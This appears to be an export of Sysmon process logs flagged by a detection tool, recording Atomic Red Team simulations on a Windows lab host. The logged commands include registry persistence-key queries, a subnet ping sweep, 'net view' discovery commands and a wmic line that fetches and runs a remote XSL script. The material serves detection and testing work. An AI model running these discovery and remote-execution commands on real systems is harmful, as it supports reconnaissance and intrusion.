"C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.175813,2019-07-19T18:49:33.175813+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ),1,"
1
5
4
1
0
0x8000000000000000
3707
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:33.113
747F3D96-D87D-5D31-0000-00102B773100
2148
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.059631,2019-07-19T18:49:33.059631+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1,"
1
5
4
1
0
0x8000000000000000
3705
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:33.019
747F3D96-D87D-5D31-0000-001090723100
196
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.990533,2019-07-19T18:49:32.990533+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" ),1,"
1
5
4
1
0
0x8000000000000000
3703
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.956
747F3D96-D87C-5D31-0000-0010056E3100
4220
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.937862,2019-07-19T18:49:32.937862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1,"
1
5
4
1
0
0x8000000000000000
3701
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.900
747F3D96-D87C-5D31-0000-00107C693100
1740
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.868916,2019-07-19T18:49:32.868916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" ),1,"
1
5
4
1
0
0x8000000000000000
3699
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.842
747F3D96-D87C-5D31-0000-0010E1643100
5936
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.807707,2019-07-19T18:49:32.807707+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1,"
1
5
4
1
0
0x8000000000000000
3697
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.775
747F3D96-D87C-5D31-0000-001056603100
6832
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547895.038554,2019-07-19T18:51:35.038554+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" )",1,"
1
5
4
1
0
0x8000000000000000
3773
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:34.991
747F3D96-D8F6-5D31-0000-001091D13300
4528
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547895.01476,2019-07-19T18:51:35.014760+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3772
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:34.779
747F3D96-D8F6-5D31-0000-00100FCB3300
3344
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1,"
1
5
4
1
0
0x8000000000000000
3771
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:22.330
747F3D96-D8EA-5D31-0000-00108AB83300
4684
C:\Windows\System32\net.exe
10.0.17763.1 (WinBuild.160101.0800)
Net Command
Microsoft® Windows® Operating System
Microsoft Corporation
net view
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
747F3D96-D8EA-5D31-0000-001030B63300
1988
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "net view"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1018] Remote System Discovery - Process,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1,"
1
5
4
1
0
0x8000000000000000
3771
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:22.330
747F3D96-D8EA-5D31-0000-00108AB83300
4684
C:\Windows\System32\net.exe
10.0.17763.1 (WinBuild.160101.0800)
Net Command
Microsoft® Windows® Operating System
Microsoft Corporation
net view
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
747F3D96-D8EA-5D31-0000-001030B63300
1988
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "net view"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547882.333688,2019-07-19T18:51:22.333688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view" ),1,"
1
5
4
1
0
0x8000000000000000
3770
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:22.302
747F3D96-D8EA-5D31-0000-001030B63300
1988
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "net view"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1,"
1
5
4
1
0
0x8000000000000000
3769
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:09.839
747F3D96-D8DD-5D31-0000-001043953300
3012
C:\Windows\System32\net.exe
10.0.17763.1 (WinBuild.160101.0800)
Net Command
Microsoft® Windows® Operating System
Microsoft Corporation
net view /domain
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
747F3D96-D8DD-5D31-0000-0010EF923300
4856
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "net view /domain"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1018] Remote System Discovery - Process,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1,"
1
5
4
1
0
0x8000000000000000
3769
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:09.839
747F3D96-D8DD-5D31-0000-001043953300
3012
C:\Windows\System32\net.exe
10.0.17763.1 (WinBuild.160101.0800)
Net Command
Microsoft® Windows® Operating System
Microsoft Corporation
net view /domain
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
747F3D96-D8DD-5D31-0000-0010EF923300
4856
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "net view /domain"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547869.845415,2019-07-19T18:51:09.845415+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view /domain" ),1,"
1
5
4
1
0
0x8000000000000000
3768
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:09.804
747F3D96-D8DD-5D31-0000-0010EF923300
4856
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "net view /domain"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547869.823311,2019-07-19T18:51:09.823311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3767
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:06.873
747F3D96-D8DA-5D31-0000-00100D8A3300
4016
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547866.88803,2019-07-19T18:51:06.888030+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl ),1,"
1
5
4
1
0
0x8000000000000000
3766
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:06.748
747F3D96-D8DA-5D31-0000-001029863300
3220
C:\Windows\System32\wbem\WMIC.exe
10.0.17763.1 (WinBuild.160101.0800)
WMI Commandline Utility
Microsoft® Windows® Operating System
Microsoft Corporation
wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E
747F3D96-D8DA-5D31-0000-0010D3833300
5340
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1,"
1
5
4
1
0
0x8000000000000000
3765
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:06.714
747F3D96-D8DA-5D31-0000-0010D3833300
5340
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1,"
1
5
4
1
0
0x8000000000000000
3765
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:51:06.714
747F3D96-D8DA-5D31-0000-0010D3833300
5340
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1603194656.569246,2020-10-20T15:50:56.569246+04:00,,Threat,Low,Found User (DESKTOP-NTSSLJD\den) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
988
Microsoft-Windows-Sysmon/Operational
DESKTOP-NTSSLJD
technique_id=T1059.003,technique_name=Windows Command Shell
2020-10-20 11:50:56.472
23F38D93-CF20-5F8E-D008-000000000C00
9620
C:\Windows\System32\cmd.exe
10.0.18362.449 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
DESKTOP-NTSSLJD\den
23F38D93-AE9B-5F8E-A2EC-170000000000
0x17eca2
2
High
SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
23F38D93-CF20-5F8E-CE08-000000000C00
6896
C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe
C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe
",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547866.728089,2019-07-19T18:51:06.728089+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3764
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:56.162
747F3D96-D8D0-5D31-0000-001034673300
396
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547856.18299,2019-07-19T18:50:56.182990+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:list ),1,"
1
5
4
1
0
0x8000000000000000
3763
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:56.021
747F3D96-D8D0-5D31-0000-0010F3623300
7040
C:\Windows\System32\wbem\WMIC.exe
10.0.17763.1 (WinBuild.160101.0800)
WMI Commandline Utility
Microsoft® Windows® Operating System
Microsoft Corporation
wmic.exe process /FORMAT:list
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E
747F3D96-D8CF-5D31-0000-00109B603300
5380
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1,"
1
5
4
1
0
0x8000000000000000
3762
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:55.978
747F3D96-D8CF-5D31-0000-00109B603300
5380
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1,"
1
5
4
1
0
0x8000000000000000
3762
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:55.978
747F3D96-D8CF-5D31-0000-00109B603300
5380
C:\Windows\System32\cmd.exe
